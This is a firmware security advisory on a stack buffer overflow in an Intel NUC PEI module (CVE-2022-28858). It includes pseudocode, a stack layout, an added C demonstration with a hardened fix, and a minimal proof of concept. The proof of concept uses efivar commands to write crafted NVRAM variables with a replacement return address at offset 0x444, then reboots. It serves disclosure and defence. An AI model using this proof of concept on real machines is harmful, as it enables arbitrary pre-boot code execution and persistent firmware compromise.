[BRLY-2022-027] The stack buffer overflow vulnerability leads to arbitrary code execution during PEI phase on Intel platform.
Summary
BINARLY efiXplorer team has discovered a stack buffer overflow vulnerability on Intel platforms allowing a possible attacker to execute arbitrary code during PEI phase.
Vulnerability Information
- BINARLY internal vulnerability identifier: BRLY-2022-027
- Intel PSIRT assigned CVE identifier: CVE-2022-28858
- AMI PSIRT assigned CVE identifier: CVE-2022-26873
- CERT/CC assigned case number: VU#158026
- FwHunt rule: BRLY-2022-027
- CVSS v3.1: 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Affected Intel firmwares with confirmed impact by Binarly team
| Device/Firmware | File Name | SHA256 (File PE32 section) | File GUID |
|---|---|---|---|
| Intel NUC M15 | PlatformInitAdvancedPreMem | 644044fdb8daea30a7820e0f5f88dbf5cd460af72fbf70418e9d2e47efed8d9b | EEEE611D-F78F-4FB9-B868-55907F169280 |
Potential impact
A potential attacker can execute arbitrary code during the PEI phase and influence the subsequent boot stages. This can lead to bypassing of mitigations, disclosure of physical memory contents, discovery of any secrets from any Virtual Machines (VMs), and bypassing of memory isolation and confidential computing boundaries. Additionally, an attacker can build a payload that can be injected into SMRAM.
Vulnerability description
The pseudocode for the vulnerable function is shown below:
```c
int __thiscall sub_FFAE2B82(void *this)
{
...
const EFI_PEI_SERVICES **PeiServices;
char CpuSetupData[1072];                 /* fixed-size stack buffer */
UINTN DataSize;
EFI_PEI_READ_ONLY_VARIABLE2_PPI *Ppi;
...
DataSize = 1072;                         /* set once, never reset between the two calls */
/* If SaSetup is larger than 1072 bytes, this call fails and stores the real variable size in DataSize */
Ppi->GetVariable(Ppi, L"SaSetup", &gSaSetupGuid, 0, &DataSize, CpuSetupData);
/* The updated DataSize is reused here, so CpuSetup can be copied past the end of CpuSetupData */
Ppi->GetVariable(Ppi, L"CpuSetup", &gCpuSetupGuid, 0, &DataSize, CpuSetupData);
...
return 0;
}
```
If the value of the SaSetup NVRAM variable is larger than 1072 bytes, then after the first call of the Ppi->GetVariable() service the DataSize value will be overwritten with the real size of the SaSetup NVRAM variable. Since DataSize is not reset, the second call of the Ppi->GetVariable() service trusts that larger size and a stack overflow may occur.
An overflow of 24 bytes is enough to execute arbitrary code, as the stack layout of the function shows:
```
-00000440 CpuSetupData db 1072 dup(?)
-00000010 var_10 db ?
-0000000F db ? ; undefined
-0000000E var_E dd ?
-0000000A db ? ; undefined
-00000009 db ? ; undefined
-00000008 DataSize dd ?
-00000004 Ppi dd ? ; offset
+00000000 s db 4 dup(?)
+00000004 r db 4 dup(?)
```
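The following is an added example, not Binarly's code and not the firmware's: it models the semantics of the ReadOnlyVariable2 GetVariable() service (as defined in the PI specification: a buffer that is too small gets the real size reported back and nothing written) against a constructed NVRAM store, reproduces the DataSize reuse from the decompiled function, and contrasts it with a hardened read that derives DataSize from the real buffer size on every call and rejects oversized variables. The names `mock_get_variable`, `g_store`, `vulnerable_pattern`, `read_setup_variable` and `hardened_pattern` are assumptions made for the demonstration; the variable sizes in the store are demo values chosen to match the 24-byte overflow the advisory names.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Minimal UEFI-style types and status codes (values as in the UEFI/PI specifications) */
typedef uintptr_t UINTN;
typedef UINTN     EFI_STATUS;
#define EFI_ERROR_BIT        ((EFI_STATUS)1 << (sizeof(EFI_STATUS) * 8 - 1))
#define EFI_SUCCESS          ((EFI_STATUS)0)
#define EFI_BUFFER_TOO_SMALL ((EFI_STATUS)5  | EFI_ERROR_BIT)
#define EFI_NOT_FOUND        ((EFI_STATUS)14 | EFI_ERROR_BIT)

#define SETUP_BUF_SIZE 1072   /* size of CpuSetupData in the decompiled function */
#define GUARD_SIZE     64     /* stands in for the saved registers and return address behind the buffer */

/* Constructed NVRAM store (demo values): both variables are 24 bytes larger than the buffer. */
typedef struct { const char *name; UINTN size; uint8_t fill; } MockVar;
static const MockVar g_store[] = {
    { "SaSetup",  SETUP_BUF_SIZE + 24, 0xAA },
    { "CpuSetup", SETUP_BUF_SIZE + 24, 0xBB },
};

/* Mock of EFI_PEI_READ_ONLY_VARIABLE2_PPI.GetVariable() with PI-spec semantics:
 * if *DataSize is smaller than the stored value, the real size is reported in *DataSize,
 * nothing is written and EFI_BUFFER_TOO_SMALL is returned; otherwise the value is copied
 * and *DataSize is set to the number of bytes written. The PPI cannot know the real size
 * of the caller's buffer: it trusts *DataSize completely. */
static EFI_STATUS mock_get_variable(const char *name, UINTN *data_size, void *data)
{
    for (size_t i = 0; i < sizeof g_store / sizeof g_store[0]; i++) {
        if (strcmp(g_store[i].name, name) != 0)
            continue;
        if (*data_size < g_store[i].size) {
            *data_size = g_store[i].size;
            return EFI_BUFFER_TOO_SMALL;
        }
        memset(data, g_store[i].fill, g_store[i].size);
        *data_size = g_store[i].size;
        return EFI_SUCCESS;
    }
    return EFI_NOT_FOUND;
}

/* Counts guard bytes that were clobbered, i.e. bytes written past the 1072-byte buffer. */
static size_t clobbered_guard_bytes(const uint8_t *frame)
{
    size_t n = 0;
    for (size_t i = SETUP_BUF_SIZE; i < SETUP_BUF_SIZE + GUARD_SIZE; i++)
        n += (frame[i] != 0);
    return n;
}

/* Mirrors the decompiled call sequence: DataSize is initialised once, the status of the
 * first call is ignored, and the updated DataSize is reused for the second call.
 * Returns the number of bytes written past the end of the buffer. */
static size_t vulnerable_pattern(void)
{
    uint8_t frame[SETUP_BUF_SIZE + GUARD_SIZE] = {0};   /* buffer followed by the simulated rest of the frame */
    uint8_t *cpu_setup_data = frame;
    UINTN data_size = SETUP_BUF_SIZE;

    mock_get_variable("SaSetup", &data_size, cpu_setup_data);   /* fails, but data_size is now 1096 */
    mock_get_variable("CpuSetup", &data_size, cpu_setup_data);  /* trusts 1096 and writes 1096 bytes */
    return clobbered_guard_bytes(frame);
}

/* Hardened read: DataSize is derived from the real buffer size on every call and an
 * oversized variable is reported as an error instead of being copied. */
static EFI_STATUS read_setup_variable(const char *name, uint8_t *buf, size_t buf_size, UINTN *out_size)
{
    UINTN data_size = buf_size;
    EFI_STATUS status = mock_get_variable(name, &data_size, buf);
    if (status != EFI_SUCCESS)
        return status;           /* EFI_BUFFER_TOO_SMALL: real size is in data_size, nothing was written */
    *out_size = data_size;
    return EFI_SUCCESS;
}

/* The same two reads through the hardened helper; reports the status and the guard bytes touched. */
static EFI_STATUS hardened_pattern(size_t *clobbered)
{
    uint8_t frame[SETUP_BUF_SIZE + GUARD_SIZE] = {0};
    UINTN got = 0;
    EFI_STATUS status = read_setup_variable("SaSetup", frame, SETUP_BUF_SIZE, &got);
    if (status == EFI_SUCCESS)
        status = read_setup_variable("CpuSetup", frame, SETUP_BUF_SIZE, &got);
    *clobbered = clobbered_guard_bytes(frame);
    return status;
}

int main(void)
{
    size_t clobbered = 0;
    printf("vulnerable pattern: %zu bytes written past the buffer\n", vulnerable_pattern());
    EFI_STATUS s = hardened_pattern(&clobbered);
    printf("hardened pattern: status %s, %zu bytes written past the buffer\n",
           s == EFI_BUFFER_TOO_SMALL ? "EFI_BUFFER_TOO_SMALL" : "other", clobbered);
    return 0;
}
```

The vulnerable sequence reports 24 guard bytes overwritten, exactly the distance from the end of CpuSetupData to the end of the return address in the stack layout above, while the hardened sequence stops at the first EFI_BUFFER_TOO_SMALL with nothing written. The same pattern is what a code audit should look for in PEI and DXE modules: a DataSize that is shared between GetVariable() calls, or a GetVariable() status that is never checked.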
Minimal POC
```shell
sudo efivar -w -f SaSetupData_new.bin --name 72c5e28c-7783-43a1-8767-fad73fccafa4-SaSetup
sudo efivar -w -f CpuSetupData_new.bin --name b08f97ff-e6e8-4193-a997-5e9e9b0adb32-CpuSetup
sudo reboot
```
The data in the file SaSetupData_new.bin may be as follows:
| Offset | Data |
|---|---|
| 0x0 | Old data of SaSetup NVRAM variable |
| 0x430 | Some data |
| 0x444 | Last dword |
The data in the file CpuSetupData_new.bin may be as follows:
| Offset | Data |
|---|---|
| 0x0 | Old data of CpuSetup NVRAM variable |
| 0x244 | Some data |
| 0x444 | New return address |
Disclosure timeline
This bug is subject to a 90-day disclosure deadline. After 90 days have elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.
| Disclosure Activity | Date |
|---|---|
| Intel PSIRT is notified | 2022-02-11 |
| Intel PSIRT confirmed reported issue | 2022-03-22 |
| Intel PSIRT assigned CVE number | 2022-03-22 |
| Intel PSIRT provided patch release | 2022-03-22 |
| BINARLY public disclosure date | 2022-08-10 |
Acknowledgements
BINARLY efiXplorer team